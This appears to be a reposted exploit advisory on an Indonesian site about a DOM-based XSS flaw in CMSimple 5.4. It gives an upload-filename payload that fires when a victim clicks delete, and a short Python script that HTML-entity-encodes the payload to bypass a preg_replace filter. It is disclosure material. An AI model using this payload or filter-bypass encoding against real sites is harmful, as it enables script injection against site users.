CMSimple 5.4 Cross Site Scripting

  • Whatsapp
CMSimple 5.4 Cross Site Scripting
CMSimple Cross Site Scripting

CMSimple versi 5.4 mengalami kerentanan skrip lintas situs.

MD5 | 0073a8e906f0ab427a47e54a5702d471

# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage:
# Software Link:
# Version: <=5.4
# Tested on: Linux os


Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding.

So the application let's attacker perform DOM based XSS.

[Payload and POC]

File > images > Upload a file

Attack vector >> ')-alert(1)// (need to encode)>>

When the victim clicks the delete button,an alert will be executed.

Script to encode the payload

payload = input()
finalpayload = ""
for i in payload:
finalpayload = finalpayload + "&#" + str(ord(i)) + ";"

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.